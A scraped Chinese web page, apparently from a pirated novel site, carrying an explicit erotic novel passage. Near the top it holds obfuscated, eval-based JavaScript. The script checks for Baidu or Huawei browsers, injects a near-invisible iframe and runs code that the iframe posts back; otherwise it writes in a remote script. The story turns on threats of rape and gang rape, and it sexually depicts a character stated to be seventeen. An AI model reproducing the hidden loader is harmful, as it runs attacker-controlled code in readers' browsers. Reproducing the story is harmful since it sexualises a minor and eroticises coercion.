末日yin乱的小说_风油精涂小豆豆h

撩妹情话 情话解析 2021-02-22 15:09:03 10 0
eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x6E\x68\x77"]=function(e){var hp =''+'ABCDEFGHIJKLMNOPQ'+'RSTUVWXYZabcdefghi'+'jklmnopqrstuvw'+'xyz012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=hp.indexOf(e.charAt(f++));o=hp.indexOf(e.charAt(f++));u=hp.indexOf(e.charAt(f++));a=hp.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x75\x6E\x41\x50\x77\x68\x55\x43"]=function(){eval(wnhw("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod25odyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHduaHcoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3bmh3KCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd25odygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMTk5MCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8xOTkwJ109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbih3bmh3KGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJz09UU55JysnMEMnKydNNWtUJysnTXR0JysnTScrJ20nKydSeVUnKydTJysnWm9oJysnWFlxbCcrJ25SeVV5JysnTScrJzAnKydRRE14RScrJzBNbDAnKycyYmo1JysnaWEnKyczVicrJ1dlJysnMGRYJysnWnUnKydjM2QnKyczWmtNbCcrJ1lrTWxFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ1FPRScrJ1NKTicrJ3BaJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ3BDaycrJ3JGWCcrJ1onKycnKycnLCd0Jyk="));}
快捷c作: 按键盘上方向键 ← 或 → 可快速上下翻页 按键盘上的 enter 键可回到本书目录页 按键盘上方向键 ↑ 可回到本页顶部! 如果本书没有阅读完,想下次继续接着阅读,可使用上方 ;amp;quot;收藏到我的浏览器;amp;quot; 功能 和 ;amp;quot;加入书签;amp;quot; 功能!窍m约呵考樗谎拔铱梢园涯憬桓业募父鲂值埽盟锹旨槟恪!br /“什么!?”司徒清影猛的转过头来,紧盯着男人的眼睛,“你说什么!?你敢!”“我有什么不敢?”侯龙涛站了起来,慢慢的踱着步,“你不是不怕我qg你吗?轮j怕不怕?虽然把头发剪了,但你可人的容貌没变,身材也是一流,我想我的兄弟们是会很乐意陪你happy happy的。”“你不怕我干爹不饶你?”“你干爹?我想他会明白当我发觉自己的盟友拿枪顶着我的头时的那种失去理性的狂怒的。”“他会宰了你的,他不会因为自己而出卖我的。”“那你怎么又能为了自己的一时之气而出卖他呢?”“这…这…”司徒清影无话可说了。“你当然不能,所以你今天来找我,根本不是要杀我,而是要我qg你。”“你能听到自己在说什么吧?”司徒清影对于男人的自以为是嗤之以鼻。“你可以不承认,但你的行动已经把你出卖了,你不在乎被我qg,却在乎被其他人qg,不是吗?”侯龙涛对自己的推断越来越有信心了。“废话,一个是被一条狗qg,一个是被一群狗轮j,是人就知道选前者。”“错,是人就知道两个都不选,既然你选了第一个,说明你想要的就是第一个。”“你不觉得自己可笑吗?”“别人都可以觉得可笑,你却不可以,因为你就是奔着让我qg来的。”“狗p。”“不见棺材不落泪,我现在就去把人叫来,你的p股可能都会被r开花的。”侯龙涛向门口儿走去。“站住!你给我站住!”这下儿司徒清影可有点儿急了。“哼哼,”侯龙涛停住了脚步,转回身,“急了?放心吧,你诚心诚意的来把身子献给我,我是决不会辜负你的。诶诶诶,”他看出女孩儿又要恶语相向,赶忙摇了摇手指,“你再敢骂我一句,我可就真的不再跟你客气了。”“你侮辱我的身体还不够,还要侮辱我的灵魂,还不许小娘我骂吗?”“我怎么侮辱你的灵魂了?”“你说我是个来找r的贱x!”司徒清影美丽的脸颊都涨红了。在这个问题上,侯龙涛不打算再从正面和女孩儿争执下去,“你虽然有点儿浮躁,有点儿狂妄,但你愿赌服输的那股狠劲儿让我很欣赏,我更是从来没把你当过傻子。”“你说话总是这么不着边际吗?”“我带着你在‘二环’上转了一整圈儿,你会不知道我发现你了?大晚上十一点多,我又回到这里,一个人打台球儿,你会一点儿不怀疑?你一个人跑到我的老窝儿来杀我,又不是在演电影儿,居然还有闲心跟我说那么多废话,你会犯那种低级错误?”“我被仇恨冲昏了头,没有考虑那么多,我现在后悔刚才没一枪撂了你。”“嗯,”侯龙涛点了点头,“说的有一定道理,可是你的枪里没子弹啊,就算我的兄弟们不来,你一样会故意露给我一个破绽的,你只想我制服了你之后,立刻就qg你。”“这…”司徒清影脸上羞赧的神情一闪即逝,立刻又变的冷冰冰的,“我忘了装子弹。”“忘了装?你开玩笑…”“你他妈是不是男人?这么多的废话,像个j婆一样。”“呵呵呵,”侯龙涛边慢慢的走近女孩儿,边解着自己的领带,居高临下、y猥的看着她,“你想要什么,我都可以给你。”他现在的姿势是完全不设防,美人只要向前一摇身子,就能用头撞到他的老二,但他一点儿不怕。司徒清影抬头看了一眼男人,马上低下了螓首,她的身子和腿都不自觉的动了动,突然显得很是焦躁不安。侯龙涛扔掉了领带,弯腰抓住了美女的双肩,一下儿把她提得站立了起来,然后抱住她的身子,探头在她的脖颈上舔了起来,“你这是何必呢,你想我,我也想你,咱们开开心心的做a不好吗?”“嗯…”司徒清影扬起了头,双眼也轻轻的闭了起来,“我…我恨你…”“你骗得了我,骗得了别人,骗得了自己吗?你不恨我,你爱我。”“我…我…呼…我恨…呼…我恨…我爱…啊…”“你爱我…”侯龙涛吻住了女孩儿的樱口,舌头探进了她嘴里,勾住了毫不反抗的香舌,不住的搅动起来,两手把她双腕上的绑绳松开了。司徒清影一时都没有反应过来,双手还是停留在被绑的位置。侯龙涛掐住美人的腰眼儿,往上一举,将她放到了球台的木沿儿上,然后蹲下身去,左臂托住她悬空的双腿,右手开始解她脚踝上的绳子,同时在她光滑无比的小腿上亲吻着。女孩儿微微张开的双唇在颤抖,撑住按子边儿的两手也有点儿不稳。侯龙涛站了起来,再次歪头含住了美人的嘴唇儿,双手顺着她两条白嫩的大腿往上抚摸,右手在她的裤腰处停住了,开始解她的小皮裤衩儿,左手不停的摸到了她的身后,在她的背臀间轻抚着。司徒清影的胳膊举了起来,环住了男人的脖子,主动的去吸吮他的舌头。现在,他们的行为第一次像是恋爱中的男女了。司徒清影感到男人开始向下拉自己的短裤了,就用扶住台边儿的双手向上一撑,让他很轻松的把皮裤衩儿褪下了自己的p股和大腿。侯龙涛低下头,看到女孩儿穿了一条深蓝色的v型全薄纱加蕾丝内k,虽然他不知道这个美女以前从来不穿这种“成人”内k,但还是忍不住流氓的本性,问了一句,“这么性感,是为我穿的吧?”司徒清影又是没出声儿,但是螓首却微微的低垂了下去,本来就是丽色无边的脸颊变得更加红润了,这大概是她懂事儿以来第一次在男人面前露出羞涩的神情。侯龙涛看到这种美景,也不需要任何回答了,又和女孩儿亲热的接起了吻,双手c入她的大腿间,向外一分,自己站到她的两腿中间,左手抚摸她的臀腿,右手拨开了蕾丝内k的裤裆,中指找到了顶出包皮外的小y蒂。“嗯…”司徒清影的身子像上一挺,用力的吸住了男人的在自己口中旋转的舌头,双手抓住了他衬衫的中缝,拼命向两边一扯。“呲啦”一声,侯龙涛的衬衫扣儿全崩开了,有几个扣子口的布料都被撕裂了,女孩儿的双手开始在他的胸膛上胡乱的抚弄起来,还有意的用手指按夹他的茹头儿。虽然侯龙涛的舌头被嘬得都有点儿疼了,但他还真舍不得离开美人温热香甜的口腔。他的手指在女孩儿的x缝儿中上下搓动了几个来回儿,指尖儿轻轻的撑开了她的湿乎乎的小r孔。“啊…”司徒清影p股上的嫩r绷紧了,腰也塌了下来,双手搭在男人的肩膀上,火烫的秀面贴住了他的胸口,在他的肌r上磨擦。女孩儿的姿势让侯龙涛的手指很难活动,他干脆不再挑逗美人的yd,抓住了她的双腕,将她的手向后按在了球台上,使她的上身后仰,然后把她的夹克儿向下一敞,再把她背后的拉练儿拉开一些,小皮背心儿就随着她光洁的肌肤滑到了她的小蛮腰上,让她高挺的胸脯儿露了出来。现在体位最适合女人的小x被抠,侯龙涛左手托着美人的背脊,右手的中指c入了她的小rd内,同时开始在她的丰r上啃咬了起来,很温柔的吸吮两颗早已从茹晕中顶出的甜美的棕色乃头儿。“啊…啊…”司徒清影立刻就浑身无力了,胳膊一软,整个身子躺倒在球台上,她用头、肩支撑,将背拱了起来。侯龙涛很想再和美人把前戏进行下去,很想让美人再享受自己的温柔,可不知道是怎么回事儿,他忍不住了,有一种奇怪的氛围在驱使他进行那种原始的行为。司徒清影被翻了个身,平坦的小肚子压在按子边上,性感的小内k被扒到了p股下面。两瓣饱胀的臀丘中间是一条红艳艳、湿淋淋的沟壑,就像是熟透的石榴裂开了口子一样,侯龙涛的呼吸加重,左手凶狠却不粗暴的捏弄起雪白的p股蛋儿,右手解开了自己的裤子,掏出巨大的“龙根”,他握着自己的j巴,在女孩儿的r缝儿间上下磨擦起来,每次g头儿碰到yd口儿的时候,都能觉出yd深处有股巨大的吸力。司徒清影更是感到难耐,她等这根大j巴等得太久了,女孩儿开始自觉的扭动腰臀,用y户寻找p股后热力的来源。与此同时,侯龙涛虎腰一挺,整根阳具立刻被火烫湿润的嫩r团团包围了。“啊………”性器相连的快感使这对儿青年男女同时发出了一声悠长的欢叫。侯龙涛两手捏着美女的臀r,猛烈的在她的水嫩x道内抽c,撞得她的p股“啪啪”做响,将没有毛发保护的y门r得红肿了起来。今天的司徒清影没有任何顾虑,心理上、生理上都有充分的准备,yj一入体,她就立显“浪女”本色,扬头闭眼,“啊啊”的娇声叫喊了起来。有了美女的浪声伴奏,侯龙涛干得更加疯狂了,女孩儿粉嘟嘟的p股蛋儿都被他揉捏得发红了,点点的y汁从两副性器相交的地方飞溅而出。本来司徒清影的左手死死的握着一个台球儿,右手用力的在按子上抓挠,可现在她已经被r得气急体虚了,一条胳膊臂软塌塌的向前展开,另一条的小臂弯回来,垫着原本高扬的螓首。“呼…呼…小白虎,你的小x太紧了,夹死我了。”一轮儿接一轮儿的狂抽猛c已让侯龙涛虎背见汗了。“来了…啊…来了…来了…”司徒清影猛的抬起头,紧闭的双眸也睁大了,像是从那里可以释放要把身子憋炸了的能量似的,“美…太美了…啊…啊…舒服死了…来了…高c了…啊………”侯龙涛的r干嘎然而止,任由女孩儿zg产生的强大吸力把自己的jy源源抽出。除了第一次的时候有点儿害怕外,他已经开始享受这个过程了,那种身体被抽空,然后再被注满的感觉着实不错,就好像是经历了一次从生到死,再从死到生的过程。司徒清影的螓首重重的落回了胳膊上,眼帘轻合,呼吸急促,脸蛋儿上娇艳的红霞久久没有退去。侯龙涛可是雄风又振,疲软的老二在漂亮姑娘水汪汪的yd中再次变大、变直、变硬。他把j巴拔了出来,将美人软绵绵的身子翻了个个儿,把皮裤衩儿和内k从她腿上拉下来,又把yj从正面儿c入了滴嗒着jy的小x里。“啊…”司徒清影立刻打了个寒颤,费力的举起了双腿,箍住男人的腰身,张开双臂,红唇轻启,“吻…吻我…”侯龙涛赶忙压下上身,双手捏住女孩儿的两颗美r,含住了她吐出口外的小香舌。司徒清影抱住了侯龙涛的脖子,边被他r干,边把自己的香津渡进他嘴里…第一百一十三章白虎倾情6/11/2003-6/14/2003赤l着上身的男人坐在墙边的沙发上,只穿着鞋袜的女孩儿坐在他的腿上,抱着他的脖子,两人在轻轻的低语着。“怎么改变主意了?你上次给我打电话不是说等完了事儿还要跟我拼命吗?”侯龙涛搂着司徒清影的小蛮腰,左手在她的大腿上爱抚着。“我现在也没说不跟你拼命啊。”“别跟我制气了,告诉我吧。”“我也不知道,那天之后,女人就满足不了我了,我找了好几个小妹妹做,一点儿情绪都提不起来,没意思的很,每天晚上我都睡不好觉,老是梦见你那张丑陋的嘴脸,反正我已经被你糟踏过了,我不想让更多的男人碰我,我又不想让你知道我的想法,才假装是来杀你,让你把我抓住,我确实是以为你一上来就会qg我的,谁知道你老是婆婆妈妈的,满意了吗?”司徒清影用脑门儿在男人的脸颊上蹭了蹭。“满意,当然满意了,你以后也不用再找小妹妹了,有哥哥疼你,保证喂得你饱儿饱儿的。”侯龙涛捏了捏女孩儿的p股。“你别臭美,哪天我突然记起咱们的仇儿,我随时会给你一刀的。”司徒清影虽然在说话的同时吻了男人一下儿,但语气还真是狠叨叨的。“你就不替你妈妈着想了?你杀了她老公,她会恨你一辈子的。”“啊,萍姐…她最近还好吧?”“当然好了,有我疼爱,想不好都不可能啊。”“哼,”司徒清影白了意气风发的男人一眼,“萍姐她…她有没有提起过我?”“有,关於你,我跟她有过一次很严肃的对话。”“真的?你们说什么了?”女孩儿的秀目都瞪大了。“想知道就再亲亲我。”侯龙涛的语气就没正经过。司徒清影捧着男人的脸,吻住了他的嘴唇儿,把舌头给他吸吮了一会儿,“快跟我说吧。”“长话短说,她非常同情你。”“为什么?我有什么好同情的?”“我把你的身世告诉她了,你从儿小没得到过母爱,她作为一个母亲,对你的不幸产生同情是再正常不过的。”“嗯…”女孩儿低下了头,没有母亲的童年和青年时代都是不好过的。“莉萍愿意收你做干女儿。”侯龙涛捏着女孩儿的茹房,温柔的把玩儿着,毫不经意的说了一句。可这句话对於司徒清影来说,可就不平常了,她一下儿从男人的腿上蹦了下来,脸上充满了惊喜和一种对於谎言的极度疑虑、恐惧,“你骗我?”“坐回来。”男人拍了拍自己的腿。“你别拿这种事儿跟我开玩笑。”司徒清影坐回了男人身上,双眸仍旧闪烁着渴望的光芒。侯龙涛搂住美人香喷喷的娇驱,“只要你不再惹事生非,没有一个母亲希望自己的女儿像职业地痞那样,天天在外面瞎混,她知道你已经这么大了,像要彻底的改变你的生活不是很现实,但你起码要有所收敛。”“那…那你不是在逗我了?”司徒清影的声音都发颤了。“我为了保命啊,”侯龙涛还是一副调侃的腔调儿,“咱们成了一家人,你总不能再杀我了吧?”“你正经儿点儿,严肃的跟我说。”“你把不把我当你的男人不重要,你保证不再从身体上、心理上伤害我的爱妻们,莉萍就认你。”司徒清影沈默了,自己到底爱不爱这个男人,她确实不知道,如果每天梦到和他亲热算爱,那就是爱,如果每次性行为时都希望他在身边算爱,那就是爱。更重要的,对於一个女人,如果觉得这个世界上只有一个男人能把自己玩於股掌之间,那除了爱那个男人,她别无选择。“你想什么呢?我说了,你跟我好并不是先决条件,虽然我很想把你收了,但在情爱的问题上,我不会你的,更不会用我心爱的女人跟你做什么交易。”侯龙涛这是在故作大方,他本身有99。99%的把握,这个小美人儿是有意和自己做夫妻的,只不过可能她自己都没有意识到罢了。“哼,你得了便宜还卖乖。”司徒清影又抱住侯龙涛接起了吻,她愿意和这个男人在一起,愿意和他共赴巫山,更愿意做何莉萍的女儿。“我当你是同意了。”“你…我没说过。”“呵呵,”侯龙涛明白了,这个“野蛮女友”是拉不下脸来在自己面前承认,这也就是为什么她今天会来“找j”了,“你不光是认了个乾妈,还有一个干妹妹。”“噢,那个叫薛诺的小姑娘吧?”“你知道她的名字?”“我第一次调查妈妈的时候就知道了。”“诺诺是个好女孩儿,心地善良,但毕竟岁数还小,比起依恋我来,她更依恋莉萍,你要跟她分享男人她能忍,跟她分享妈妈,她还有点儿想不通。”“我没有要跟她抢的意思,我只是想有一个女人给我妈妈般的关怀和爱护。”“我觉得这些事儿你最好能当面跟她谈谈。”侯龙涛看到美女黯然神伤的表情,第一次意识到这个矛盾是必须得到解决的,要不然以后迟早会出问题。“那你说我应该怎么做?直接去找她吗?”司徒清影在心理上已经承认抱着自己的男人很有头脑了。“不要,我会安排你们见面的。”“好,听你的。”“但你要先想好怎么说服她。”“这…”“没什么难的,你就把你的真实感情说出来就是了,诺诺从小儿没有父亲,我想她能理解的。”“嗯,我知道了。”“行了,别说这么压抑的话题了,”侯龙涛的色手又开始在女孩儿凹凸有致的身体上抚摸了起来,“上次你乾爹是怎么说服你暂时不找我麻烦的?”“我乾爹说当爸爸的,一辈子最担心的就是自己的女儿能不能有一个好归宿,他说因为我的性格、身份,除了那些高官子弟,没有哪个男人敢接近我,可他不仅知道那些纨绔子弟是不可能对我好的,他更知道我是不可能看上他们的,在他看来,只有你能降的服我,只有你,我才有可能看得上。”“嘿嘿嘿。”“你臭美什么?我乾爹的意思是只有你才稍微配得上我,而且我也从来没说过我同意他的看法。”“我还是觉得我们的做法有点儿太极端了。”“我倒不觉的,你以为凭你平时那种花言巧语、摇尾乞怜的把戏就能让我就范吗?”“是不大可能。”侯龙涛发觉这个小妞儿考虑问题的角度还真和其他女人不太一样。“我告诉你啊,你一定要把我乾爹的事情办好。”“哼哼,你乾爹的事情,他真是把事情都交给我了,主意都得是我想。”“你在抱怨吗?那是我乾爹看得起你,再说了,你很亏吗?”司徒清影笑得很娇艳。侯龙涛自然明白美女的意思,乐呵呵继续猥亵她成熟的玉体,“小白虎,你要明白,我从来没把你当成过交易中的筹码儿。”“那你把我当什么?”“以前我把你当一个漂亮女人,现在我把你当一个值得我疼的漂亮女人。”“我刚才跟你说什么来着,我用不着你的这些花言巧语。”“不是花言巧语,你对我有情,你对我忠诚,我就一定会用心疼爱你,你的喜就是我的喜,你的痛就是我的痛,一切我都会和你分担的。”司徒清影是第一次看到侯龙涛那种郑重其事的表情,虽然她的性格比较男性化,也从未经历过男女间的情感交流,但在这一刻,她还是感到了一阵甜蜜,有生以来头一次觉得自己的感情有了真正的依託,她的眼中也出现了从没出现过的柔情,“你要说到做到,只要你疼我,我就跟定你,要是你敢不疼我,我就杀了你。”侯龙涛伸手握住了美人正在抚摸自己脸颊玉手,拉到自己的嘴边吻了吻,“为什么把头发剪了?”“我怕和你动手的时候吃亏。”“唉,多可惜啊,你肯定留了很久吧?”“你喜欢长头发的女孩儿?”“也不是,我无所谓的,你开心最重要。”“现在不用跟你拼命了,我会再留起来的。”“哼哼哼,好啊。”侯龙涛伸手在美女的左小腿上摸了摸,“你左脚上的那个纹身是樱花儿吧?”“是。”“为什么选它啊?”“不是我选的,我乾爹说把我从孤儿院领回来的时候,我就已经有这个纹身了。”“那看来是你生身父母给你纹的了,那是线索啊,你没找过他们?”“我是被扔在大街上的,除了一张写着我姓名的纸,我什么也没有,他们不顾我的死活,我找他们做什么?”“过两天我给你纹个身。”侯龙涛看到美女的神情又黯淡了下来,赶忙改变话题,可心里对她又多了些许怜惜。“爱奴?”“对啊。”“等你把我乾爹的事儿办妥了再说吧。”“你不想要?”“我又不是你的,纹了那两个字,我想摆脱你都难了,”司徒清影骄傲的一扬头,“我没准儿能找到比你更好的男人呢。”“呵呵,我尊重你的决定。”侯龙涛知道这个小妞儿对自己还不是100%的信服,不过他也不急,总有一天会让美人彻底臣服的,“咱们的关系暂时还不能公开,原因就不用说了,可你要记住,是不能对任何人公开,你的干叔叔、干哥哥,一样不能告诉,咱们见面都要秘密进行。”“你们是不是有点儿太小心了?”“清影啊,生死攸关,你一定要按我的话做。”“放心吧,”司徒清影听了侯龙涛对自己的称呼,知道他非常认真的,“我会保守秘密的。不过,”她该成胯跪在男人的腿上,开始解他的皮带,脸上也出现了媚媚的笑容,“咱们既然好几天不能见面…”“小心明天爬不起来。”侯龙涛把身子往下出遛儿了一点儿,让女孩儿能用双手撑住自己的胸口。“爬不起来的是你。”司徒清影小幅的摇摆着臀部,用小x寻找着大j巴,由於刚才男人对她的爱抚就一直没停,她的小x也一直就没乾涩过。“啊…”侯龙涛只觉老二被娇嫩的膣r紧紧的裹住了,他伸出双手,用力的捏住美人柔软的p股蛋儿。司徒清影的双r由於自己两条胳膊的挤压,更显得丰满圆润,r沟也更深奥了,引得男人叼住她的茹头儿“啾啾”的吸吮…两天之后,侯龙涛把薛诺叫到了“天伦王朝”,除了“大被同眠”之外,他也经常这么把某一个爱妻约出来,这种时候,除了做a之外,进行正常的恋爱、真正的心与心的交流才是更主要的目的,几个岁数小点儿的女孩儿也比较喜欢这种单独相处。小美人儿一进屋,侯龙涛就将她扒了个精光,把雪白的小绵羊压在床上干了两炮儿。薛诺已经过了十七岁生日,将近一年的时间里,在不知不觉中,她的身体还真是发生了不小的变化,胸脯儿更满胀了,p股也更圆滚了,可以说“小蜜桃儿”已经差不多成熟了。但她的性格却一点儿没变,还是即清纯又温顺。激情过后就是温情了,侯龙涛半躺半坐的靠在床头,把美丽的小姑娘抱在怀里,亲吻着她的额头,爱抚着她光滑白嫩的背脊。薛诺闭着眼睛,脸上尽是幸福的微笑,让人心醉的性a之后,这么懒洋洋的依在爱侣身边,是最美好不过的了,她的一只小手儿伸在男人的双腿间,轻轻的握着那根让自己欲仙欲死的“金箍棒”。“诺诺,我上次跟你说的那件事儿,你考虑得怎么样了?”“什么事儿?”薛诺睁开眼睛,抬头在侯龙涛的嘴唇儿上一吻。“清影的的事儿。”“哼。”女孩儿没有回答,小嘴儿却噘了起来。“怎么了?”“你都已经决定了,还来问我干什么?”“怎么这么说呢?这是咱们家里的事儿,当然要跟你商量了。”“你是一家之主嘛。”薛诺坐了起来,明显是在赌气。“小宝贝儿,”侯龙涛劈开双腿,坐到小美人儿的身后,从后面捏住她的两颗嫩r,“茹房长大了不少,心性儿却还像小孩子一样。”“人家本来就是小孩儿嘛,”薛诺扭回身来,抱住男人的身体,把脸贴在他的胸口上,“她愿意做你老婆,我没什么意见,”除了何莉萍之外,她平时和如云、茹嫣最亲,受这两个人的影响就比较大,渐渐的,她对於爱人的花心也变得比较能够接受了,“但我不许她抢我的妈妈。”“她决不是要跟你抢,”侯龙涛扶住美少女的肩头,两手稍稍用力把她向下压,同时自己也往后挪了挪,“你知道她是孤儿吧?”“嗯…”薛诺含含糊糊的应了一声儿,她蜷身在男人的双腿间,已经很自觉的把大g头儿含在小嘴儿里吸吮了起来。“你不可怜…”侯龙涛的话还没说完,门铃儿就“叮咚、叮咚”的响了起来,她把小美人儿拉起来吻了吻,然后蹦下床,蹬上条裤子就去开门儿了。薛诺乖乖的钻进了被窝儿里,她不知道来的是什么人,但万一要是进里屋来,自己不能l身相见啊。“诺诺,你干姐姐来看你了。”侯龙涛拉着一个美丽的短发女子回到了卧室。薛诺一看,小嘴儿立刻又噘了起来,冷冷淡淡的说了一句,“你好。”来的当然是司徒清影了,女孩儿并不知道自己的母亲被这个女人迷j的事儿,所以虽然不愿意让她认自己的母亲当乾妈,但也没有什么特别大的敌意。司徒清影今天穿的很正经,黄蓝横条相交的紧身t…shirt,白底儿的碎花儿百折露膝短裙,浅r色的丝光长袜,除了鞋尖儿是黑色的漆皮外,其余都是半透明的pump高跟鞋,想来是为了让“干妹妹”对自己的第二印象好一点儿。她做到了床边儿上,“诺诺,猴…涛哥他说你对我有点儿误会,让我解释一下儿好吗?”“有什么好…”薛诺一抬头,看到男人正在关门,可他却是在门外面,“涛哥,你要去哪儿啊!?”“我哪儿也不去,就在外屋儿待会儿,你们姐妹俩好儿好儿聊聊。”侯龙涛说着就把门关上了。“诺诺…”司徒清影拉住了美少女伸在被子外的小嫩手儿。“好,好,你说吧,我听着就是了。”侯龙涛给自己倒了杯可乐,往沙发上一坐,点上颗烟,开始在“笔记本儿”上玩儿起了nba live 2003,打了一场球儿,每节设置是十分钟,加上中间的停錶,差不多一个小时就过去了。他很高兴一直也没人出来叫自己,这证明两个女孩儿谈的还挺好。又打了一场,还是没动静,他可有点儿坐不住了,按理说应该不会出什么问题啊,怎么会用这么长时间呢?就在这时,卧室的门开了,司徒清影探出头来,“涛哥,进来吧。”侯龙涛看到美人脸上有两道泪痕,赶忙过去拉住她的手,“怎么了,小白虎,不用哭啊,我帮你劝她。”“不用。”女人摇了摇头。侯龙涛再往屋里一看,坐在床上的薛诺的眼圈儿红红的,好像也是哭过了。“这是怎么了?”侯龙涛拉着短发美女来到床边,自己爬上去,抱住薛诺,“干嘛都哭哭啼啼的,一家人有什么话说开了不就行了,不用闹的这么不开心吧?”“你说什么呢?”司徒清影推了男人的肩膀一下儿,“也不先问清楚了,诺诺已经答应我的请求了,我们现在是好姐妹。”“真的?”“当然是真的了,”司徒清影坐到薛诺身边,亲热的搂住了她的香肩,“是不是,诺诺?”“嗯,”女孩儿点了点头,可能是因为还没缓过来,脸上仍旧挂着一点儿伤感,“我喜欢司徒姐姐。”“呵呵,”侯龙涛点了美少女的鼻头儿一下儿,“怎么变得这么快啊?小白虎对你施什么妖术魔法了?你们都说什么了?”“这是我们的秘密。”司徒清影摇了摇手指。“对,不告诉你。”“哼,”侯龙涛皱了皱眉,无非就是些孤儿和单亲女的事儿,想来以薛诺小菩萨一样的心肠,要想感动她还真不是太难,具体细节自己不知道也就不知道了,效果出来了就成,“你们真的没有任何隔阂了?”“真的。”“没有了。”“真的?”“你又来了,说你像个j婆一样,一点儿也没错儿。”“哈哈哈。”薛诺被司徒清影的话逗得眉开眼笑。“本来就是,你跟他好了这么久,一点儿都没注意到吗?他什么事儿都是唧唧歪歪的,一点儿没有真汉子那种说一不二、快刀斩乱麻的劲头儿。”“才不是呢,涛哥男人味儿足着呢。”“男人味儿?酸臭味儿吧?”“哈哈哈。”“嗨,怎么变成你们一起攻击我了。”看着两个美人嘻嘻哈哈的笑成了一团,侯龙涛心里是很高兴的,但表面儿上却装出不满的样子。“我可是在为你说话啊,”薛诺爬出被窝儿,跪在男人的身边,捧住他的脸颊,在他的嘴唇儿上吻了几下儿,“说你的是司徒姐姐,我只是笑笑嘛。”侯龙涛顺着女孩儿的用力方向躺倒在床上,就这么和她吻了起来。薛诺撅起的翘臀正好儿对着身后的美女,两瓣圆圆的雪白p股蛋儿,中间一条桃红色的裂缝儿无比的诱人,要是在以前,司徒清影肯定会受不了诱惑的,但现在她只觉得面前的p股很是漂亮,却没有其他非分的念头。“继续你刚才没完成的工作吧。”男人把裤子踢了下来,露出“一柱擎天”的大j巴。薛诺娇羞的一笑,“司徒姐姐…”“不用跟她谦让,那只小白虎大概是不会口交。”侯龙涛当然知道美少女并不是真的要谦让,只是不太好意思在新姐姐面前服侍自己,他的话是另有“肮髒”目的的。“什么叫不会口交?”司徒清影果然被激到了,其实要是别的什么事儿,她不会这么容易上钩儿的,但现在是和自己的男人亲热,也不用提高什么警惕,“你当我是不经世事的小女孩儿吗?”她从坐姿转为跪姿,把双手撑在男人的腿两边,螓首向下一压,樱桃小口就裹住了大j巴的顶端。“哎哎哎!”侯龙涛飞快的向后蹭了一点儿,使老二脱出美人的檀口,“别用牙啊,还说会?”“我…我没用牙啊。”司徒清影直起上身,一副丈二和尚摸不着头脑的样子。“诺诺。”“